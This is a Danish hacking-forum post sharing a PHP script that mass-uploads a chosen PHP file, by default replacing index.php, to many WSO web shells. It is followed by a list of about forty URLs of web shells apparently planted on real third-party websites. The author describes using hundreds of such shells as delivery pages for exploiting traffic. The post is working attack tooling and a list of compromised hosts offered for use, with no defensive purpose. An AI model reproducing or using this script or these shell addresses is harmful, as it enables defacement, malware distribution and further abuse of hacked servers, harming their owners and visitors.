Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
WSO Shell Uploader + gratis shells til test af scriptet.
10-10-2016, 21:54 (Denne besked var sidst ændret: 10-10-2016, 22:15 af Prec0se.)
#1
WSO Shell Uploader + gratis shells til test af scriptet.
Denne uploader er lavet specifikt for WSO shells, du kan masse upload en liste med shells, du specificere path til din wso shell.
Eksempel: http://dinside.dk/x.php

På samme server som du uploader dette script skal du lave en txt-fil som hedder kode.txt og i den indsætter du din PHP kode.
Din PHP kode i kode.txt vil blive lavet om til en PHP fil og så kan du mass upload din PHP fil til alle din shells.

Mixede den hurtigt sammen til når jeg selv håndtere store lister med 250-500 shells som jeg bruger som leverings sider eller som "clean pages" når man exploiter større mængder af traffik.
<?PHP
       if(isset($_POST['shells'])) {
            $list = explode(PHP_EOL, $_POST['shells']);

            foreach ($list as $val) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_VERBOSE, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_URL, $val);
                curl_setopt($ch, CURLOPT_POST, true);
                $file = new CURLFile('kode.txt');
                $file->setPostFilename("index.php"); // ændre det til det som din ekstra side skal hedde eller lad den blive hvis formålet er at ændre index siden.
                $post = array('a' => "FilesMAn", 'c' => "", 'p1' => 'uploadFile', 'charset' => 'Windows-1251', 'f' => $file);
                $url = parse_url($val);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
                curl_exec($ch);
                echo $url["host"] . " | fil er uploaded." . "<br>";
            }
        }

        echo '
        <h2>indsæt din shell liste</h2><br>
        <form method="POST">
        <textarea class="form-control" style="resize: vertical;" name="shells"></textarea><br>
        <button type="submit">Upload kode</button>
        </form>
        ';
?>

Her er en liste med nogle shells så man kan teste scriptet:
// denne liste er lidt ældre men nogle af dem virker fint, de er kode injektet så lad hver at besøge dem direkte, gå kun direkte til wso shells.

http://www.jsc.lt//tmp/wso.php
http://www.petrolguardian.com//tmp/wso.php
http://penyel.com.br/wso.php
http://www.nvc.com.cy/wso.php
http://nicoband.ru/wso.php
http://dupreedance.com//wso.php
http://en.torshin.ru/wso.php
http://www.engtest.net/wso.php
http://farmproducts.ru/wso.php
http://www.orderartwork.com/wso.php
http://www.citylog.com.ar/wso.php
http://goulis.gr/wso.php
http://cerawear.hu/wso.php
http://radonejskiy.ru/wso.php
http://stroipozhservis.ru/wso.php
http://ns1.bigday.com.hk/wso.php
http://dolchelecro.es/wso.php
http://korglobalservices.com/wso.php
http://allfile.ir/wso.php
http://mail.raulmarinho.com/wso.php
http://6october.info/wso.php
http://furg.se/wso.php
http://craigclearyconstructions.com/wso.php
http://www.bjchenyangjiaju.com/wso.php
http://www.aeongv.com/wso.php
http://ywzj.s602.xrea.com/wso.php
http://www.orchardcroft.ca/wso.php
http://www.88711.cn/wso.php
http://www.boiler123.com/wso.php
http://www.yunsbridal.cn/wso.php
http://officestoday.com/wso.php
http://chdup.com/wso.php
http://www.xuanwudd.com//wso.php
http://www.hcxk.net//wso.php
http://proresultsrealestate.com//wso.php
http://duniakereta.com//wso.php
http://rawbeets.com//wso.php
http://yorkshirecottageservices.co.uk//wso.php
http://en.sinengpower.com//wso.php
http://www.scmbxs.com//wso.php
http://www.valour.com.cn//wso.php
http://km888.com.cn/wso.php
http://www.hhszwh.com/wso.php
I skal have insigt i jeres egne styrker og udfordringer så bliv motiveret istedet for at blive sur hvis jeg kommer med sandheden.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)